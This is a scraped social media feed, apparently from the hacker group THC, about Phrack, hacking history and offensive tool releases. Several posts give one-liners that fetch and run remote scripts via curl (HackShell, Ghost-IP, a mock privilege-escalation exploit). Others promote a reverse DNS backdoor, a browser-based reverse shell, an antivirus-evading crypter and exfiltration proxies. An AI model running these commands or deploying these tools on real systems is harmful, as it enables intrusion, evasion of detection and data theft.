PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. π₯ #40yrsOfPhrack #phrack72
20.06.2025 20:19 β π 126 π 30 π¬ 5 π 0@hackerschoice.bsky.social
Security Research Group.
PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. π₯ #40yrsOfPhrack #phrack72
20.06.2025 20:19 β π 126 π 30 π¬ 5 π 0Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").
May want to discuss this with your therapist. π€·ββοΈ
www.sentinelone.com/labs/follow-...
Generate your own python-implant of a reverse DNS backdoor. thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.
05.06.2025 17:46 β π 3 π 0 π¬ 0 π 0π£ CRACKME RESULTS are OUT! π₯
Congrats to rt_saber for being so quick.
Kudos to all those who hammered CloudFlare hard.
github.com/phrackzine/c...
ascii art easter bunny, by jgs
π£HAPPY EASTER FROM PHRACK π£
PHRACK EASTER-2025 CHALLENGE: Find the hidden easter egg by solving the riddle:
πZGlnICtzaG9ydCBlZ2c/Pz8/LnBocmFjay5vcmcgVFhUπ
Details: github.com/phrackzine/c...
new FEATRUE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to virustotal.com or any other but the target host.
Please don't set BC_LOCK="rm -rf ~/" π
github.com/hackerschoic...
I've just been told that John Young of Cryptome.org passed away last week.
#Cryptome was foundational, and a predecessor to organizations like @ddosecrets.com and #Wikileaks.
RIP, John.
πΏTHC member on camera. A first. π
30 years of hacking - a perspective and a reflection. πΊ π Keep Hacking π The next 30 years of hacking start today. β€οΈ thanks @wwsul.bsky.social
www.youtube.com/watch?v=sQVL...
Ransomware groups will be raising extortion demands 10% due to Tariffs
03.04.2025 03:06 β π 60 π 13 π¬ 1 π 1CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
β. <(curl -SsfL thc.org/7350pipe)%E2...
Paged Out! #6 has arrived! And it's jam-packed with content!
You can download it here:
pagedout.institute?page=issues....
THC RELEASE πΊ: A Linux Binary Runtime Crypter - in BASH π Works for ELF-binaries and Bash/Perl/Python/PHP-scripts alike (and obfuscates the scripts). π
github.com/hackerschoic...
THC's memexec now supports x86_64, aarch64, arm6/7 and mips64. The perl version is a 1-liner (cat /usr/bin/id | memexec) :> Helps to overcome noexec-mounts: π github.com/hackerschoic...
25.03.2025 11:58 β π 5 π 1 π¬ 0 π 0The Hackerβs Manifesto. We are all alike.
25.03.2025 09:42 β π 6 π 1 π¬ 0 π 0table of contents for tmp.0ut volume 4
Would you look at that, it's tmp.0ut Volume 4! Happy Friday, hope you enjoy this latest issue!
tmpout.sh/4/
Afaik even in origin fetch they sync the origin session key to the edge, decrypt all at the edge and then re-encrypt with the origin session keyβ¦at least thatβs how it used to be (always cleartext at the edge. They read all traffic. So does AWS or yandex and any other βedgeβ provider)
18.03.2025 06:23 β π 1 π 0 π¬ 0 π 0Watching the Internet realise that CloudFlare decrypts ALL https traffic at the edge is hilarious. πΏπΏπΏ πππ TLS only to the edge. Half-way. CF sees all your dirty secrets. π»
blog.cloudflare.com/password-reu...
#phrack Aug/2025 release >>> write an article and become immortalised.
17.03.2025 07:34 β π 8 π 1 π¬ 0 π 0@2600.com . I signed up for 2600 again. We love you guys β€οΈ. THC/TESO members founded the first 2600 meet-up in Germany (Karlsruhe) some decades ago. Our Bsky picture was taken at one of those meetings (drunk). π»
15.03.2025 15:15 β π 19 π 4 π¬ 0 π 0THC π» Ghost-IP π» updated: source <(curl -fsSL github.com/hackerschoic...)
Picks an unused IP and forces your current shell and all child processes to originate from that Ghost IP. π
We temporarily disabled web/gui access to Segfault. SSH access works as usual: ssh root@segfault.net, password is βsegfaultβ.
06.03.2025 19:14 β π 2 π 0 π¬ 1 π 01-Line RAT => REVERSE Remote Shell Access with a Web Browser to any Linux Bash SHELL π. (see github.com/hackerschoic...)
24.02.2025 15:46 β π 4 π 3 π¬ 0 π 0WWSUL Episode #2 released. Featuring Sangfroid of w00w00 and HERT. π«‘π€ #hackerhistory
youtu.be/O0CmLzhggrw?...
β€οΈβ€οΈβ€οΈ
14.02.2025 19:49 β π 0 π 0 π¬ 0 π 0Updated HackShell with new commands and more EDR/AV detection and warning if admin is active (github.com/hackerschoic...).
source <(curl -SsfL thc.org/hs)
Comprehensive ARCHIVE of Hacking-History: gbppr.net/proj.html π
Shoutz to ADM, phenoelit, 8lgm, teso, 9x (substance!!!!), g0bbles, gov-boi, ..
π¬Smallest Reverse-DNS Tunnel Backdoor πͺ. More at thc.org/tips β€οΈβπ₯
πΊ Have a nice weekend. πΊ
Updated thc.org/tips (3.vi.d) with an example for a SOCKS5 reverse Proxy via CDN _not_ needing Gost or websocat (only using SSH & cloudflared on the target). #exfil
06.02.2025 14:39 β π 3 π 0 π¬ 0 π 0Loving it β€οΈ
03.02.2025 19:33 β π 1 π 0 π¬ 0 π 0THC RELEASE: Article - Practical HTTPS Interception - exploiting the cleartext ACME-HTTP-AUTH loophole (Let's Encrypt, ...) to retrieve valid HTTPS certificates. #tls #https
blog.thc.org/practical-ht...